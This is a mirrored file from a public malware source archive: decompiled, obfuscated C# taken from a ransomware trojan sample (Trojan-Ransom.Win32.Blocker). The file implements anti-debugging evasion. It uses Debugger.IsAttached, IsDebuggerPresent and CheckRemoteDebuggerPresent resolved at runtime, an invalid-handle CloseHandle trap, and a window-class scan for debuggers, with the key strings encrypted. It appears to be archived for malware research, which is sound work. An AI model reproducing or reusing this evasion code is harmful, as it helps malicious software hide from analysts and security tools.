mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
215 lines
9.7 KiB
C#
215 lines
9.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: A.c6483995e04301d945fdc8bbbeb2fdfcb
|
|||
|
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
namespace A
|
|||
|
{
|
|||
|
internal class c6483995e04301d945fdc8bbbeb2fdfcb
|
|||
|
{
|
|||
|
internal const uint c815d7d663eef3c44b2caa9f3d6111388 = 1024;
|
|||
|
internal const uint ce1a64a0ce40f52be8d5cd5f2ab8d4bec = 64;
|
|||
|
internal const int c9e8de4583ee928c4800269558d166b7e = 0;
|
|||
|
private static bool c75ea3b951856ad38b52cbf8b6402d522;
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "SetLastError")]
|
|||
|
internal static extern void c391cc9da68ba80667b423713f74af35b(
|
|||
|
uint c3c2d28d090853af7ce1e2c9436d4e6b3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
|
|||
|
internal static extern int cace4d6faccfae54b4cce02f5ff6a9d78(
|
|||
|
IntPtr c1511c2036aa4b7ba89764385ca9dba92);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
|
|||
|
internal static extern IntPtr ccfa0dd8bc046c30e43dcac27b0790853(
|
|||
|
uint c104f3bd454450b5fae258ea4698c08fa,
|
|||
|
int c7e99aabe62df3fabf80d42cf90e0e3f0,
|
|||
|
uint c56f77053e15999af6844efc9bdde822d);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetCurrentProcessId")]
|
|||
|
internal static extern uint c30c15026493b976c2325f72361ac915c();
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary", CharSet = CharSet.Auto, SetLastError = true)]
|
|||
|
internal static extern IntPtr c70f94891cb4225163b481930fa82b941(
|
|||
|
string c17f152cc83728b20f2e2e392435ccca5);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c808000474b78cc57ff5e0ac36b3fcc73 cb3b55426f89535f91bb419e6996e2646(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cc055647fecedcfcae1eaf4bbad26d609 c6dbc9e316fddad0a9f7623fb3be9ceff(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cdf87155547dda952c916d9b76727151f(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c4d8130fdf16941c5a049e8c5637a73b3(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c8b9df66c099e027db7fe27eeb5d97544 c823a12567a85c9243ae40e47539c1cbb(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
|
|||
|
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c7dda1f225a33dfcf98fae6f7e3f67461(
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490,
|
|||
|
string c85d99f904a6bb91d7c1a6a0954317af3);
|
|||
|
|
|||
|
private static int c084af11cdc465888c3ed538fb3591a27(
|
|||
|
IntPtr c157a4097f532e5292cc2957be55db66e,
|
|||
|
IntPtr c3ac7a813ea74272766c650f10278c114)
|
|||
|
{
|
|||
|
string[] strArray = new string[1]
|
|||
|
{
|
|||
|
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2181)
|
|||
|
};
|
|||
|
string strA = c6483995e04301d945fdc8bbbeb2fdfcb.c8859338e5a3695a878c4bf6705d5751e(c157a4097f532e5292cc2957be55db66e);
|
|||
|
foreach (string strB in strArray)
|
|||
|
{
|
|||
|
if (string.Compare(strA, strB, true) == 0)
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = true;
|
|||
|
return 0;
|
|||
|
}
|
|||
|
}
|
|||
|
return 1;
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "GetClassName", CharSet = CharSet.Auto)]
|
|||
|
internal static extern int cbb7fbb3e253592177be35000370dc20a(
|
|||
|
IntPtr c3ffd86e445fc1629a21a22d8b6f86a4b,
|
|||
|
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490,
|
|||
|
int c668f9f3a61afe17d1174701f81735e18);
|
|||
|
|
|||
|
internal static string c8859338e5a3695a878c4bf6705d5751e(
|
|||
|
IntPtr c5de7cfd6591e65c25b36e0738fcc29da)
|
|||
|
{
|
|||
|
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490 = new StringBuilder(260);
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.cbb7fbb3e253592177be35000370dc20a(c5de7cfd6591e65c25b36e0738fcc29da, cb9c6716f9fec7a6b7c9e19bedc9f2490, cb9c6716f9fec7a6b7c9e19bedc9f2490.Capacity);
|
|||
|
return cb9c6716f9fec7a6b7c9e19bedc9f2490.ToString();
|
|||
|
}
|
|||
|
|
|||
|
internal static void cface76737f299c15f46aea51d2f361b6()
|
|||
|
{
|
|||
|
if (c6483995e04301d945fdc8bbbeb2fdfcb.ca73ad72d5e801fc691a6bdacf00b1e12())
|
|||
|
throw new Exception(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2196));
|
|||
|
}
|
|||
|
|
|||
|
internal static bool ca73ad72d5e801fc691a6bdacf00b1e12()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (Debugger.IsAttached)
|
|||
|
return true;
|
|||
|
IntPtr c6b70c3224512397ad0c3a2798d87e490 = c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2352));
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c9d3e290b2a38dccd6dec3b8cbf70f0c7 = c6483995e04301d945fdc8bbbeb2fdfcb.c4d8130fdf16941c5a049e8c5637a73b3(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2377));
|
|||
|
if (c9d3e290b2a38dccd6dec3b8cbf70f0c7 != null && c9d3e290b2a38dccd6dec3b8cbf70f0c7() != 0)
|
|||
|
return true;
|
|||
|
IntPtr num1 = c6483995e04301d945fdc8bbbeb2fdfcb.ccfa0dd8bc046c30e43dcac27b0790853(1024U, 0, c6483995e04301d945fdc8bbbeb2fdfcb.c30c15026493b976c2325f72361ac915c());
|
|||
|
if (num1 != IntPtr.Zero)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cb52fb1903297a0d67737ce529c917679 = c6483995e04301d945fdc8bbbeb2fdfcb.cdf87155547dda952c916d9b76727151f(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2412));
|
|||
|
if (cb52fb1903297a0d67737ce529c917679 != null)
|
|||
|
{
|
|||
|
int pbDebuggerPresent = 0;
|
|||
|
if (cb52fb1903297a0d67737ce529c917679(num1, ref pbDebuggerPresent) != 0)
|
|||
|
{
|
|||
|
if (pbDebuggerPresent != 0)
|
|||
|
return true;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(num1);
|
|||
|
}
|
|||
|
}
|
|||
|
bool flag = false;
|
|||
|
try
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(new IntPtr(305419896));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
flag = true;
|
|||
|
}
|
|||
|
if (flag)
|
|||
|
return true;
|
|||
|
try
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c92e35801b4eaae7ab7d70e17c0173e9c = c6483995e04301d945fdc8bbbeb2fdfcb.c7dda1f225a33dfcf98fae6f7e3f67461(c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2465)), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2486));
|
|||
|
if (c92e35801b4eaae7ab7d70e17c0173e9c != null)
|
|||
|
{
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = false;
|
|||
|
int num2 = c92e35801b4eaae7ab7d70e17c0173e9c(new c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737(c6483995e04301d945fdc8bbbeb2fdfcb.c084af11cdc465888c3ed538fb3591a27), IntPtr.Zero);
|
|||
|
if (c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522)
|
|||
|
return true;
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
[StructLayout(LayoutKind.Sequential)]
|
|||
|
internal class c35ad2d2b7d5d5e5e9092a2e2f7ca2384
|
|||
|
{
|
|||
|
internal IntPtr c7ba91d8fad77443c443bf7d678c49ce5;
|
|||
|
internal IntPtr cbd073e7d3c73e14c44cb6a8c7608c269;
|
|||
|
internal IntPtr ce57239c4110302077b325d4f0ddc2a7e;
|
|||
|
internal IntPtr cbe6898bbda725d30c0f429c4e8b0262e;
|
|||
|
internal IntPtr c4517ace766e7dab5ea383c670cb1d2eb;
|
|||
|
internal IntPtr c6609b7e1d07cfe2dc208c6746a4a790d;
|
|||
|
}
|
|||
|
|
|||
|
internal delegate int c808000474b78cc57ff5e0ac36b3fcc73(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.c35ad2d2b7d5d5e5e9092a2e2f7ca2384 ProcessInformation,
|
|||
|
uint ProcessInformationLength,
|
|||
|
out uint ReturnLength);
|
|||
|
|
|||
|
internal delegate int cc055647fecedcfcae1eaf4bbad26d609(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
out uint debugPort,
|
|||
|
uint ProcessInformationLength,
|
|||
|
out uint ReturnLength);
|
|||
|
|
|||
|
internal delegate int c9d3e290b2a38dccd6dec3b8cbf70f0c7();
|
|||
|
|
|||
|
internal delegate void c8b9df66c099e027db7fe27eeb5d97544([MarshalAs(UnmanagedType.LPStr)] string lpOutputString);
|
|||
|
|
|||
|
internal delegate int cb52fb1903297a0d67737ce529c917679(
|
|||
|
IntPtr hProcess,
|
|||
|
ref int pbDebuggerPresent);
|
|||
|
|
|||
|
internal delegate int cc2644b96756a32d21ac3b9be2d8f2737(IntPtr wnd, IntPtr lParam);
|
|||
|
|
|||
|
internal delegate int c92e35801b4eaae7ab7d70e17c0173e9c(
|
|||
|
c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737 lpEnumFunc,
|
|||
|
IntPtr lParam);
|
|||
|
}
|
|||
|
}
|